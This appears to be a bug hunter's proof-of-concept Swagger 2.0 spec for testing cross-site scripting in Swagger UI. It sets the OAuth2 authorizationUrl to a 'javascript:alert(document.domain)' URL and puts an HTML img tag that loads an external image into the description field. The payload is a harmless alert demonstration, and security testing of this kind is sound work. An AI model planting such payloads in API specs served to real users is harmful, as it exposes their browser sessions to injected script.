swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: Bug Hunting is an Arit & I am an Artist!
  description: <img src=https://raw.githubusercontent.com/iamarit/SwaggerUiTesting/main/test.png>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
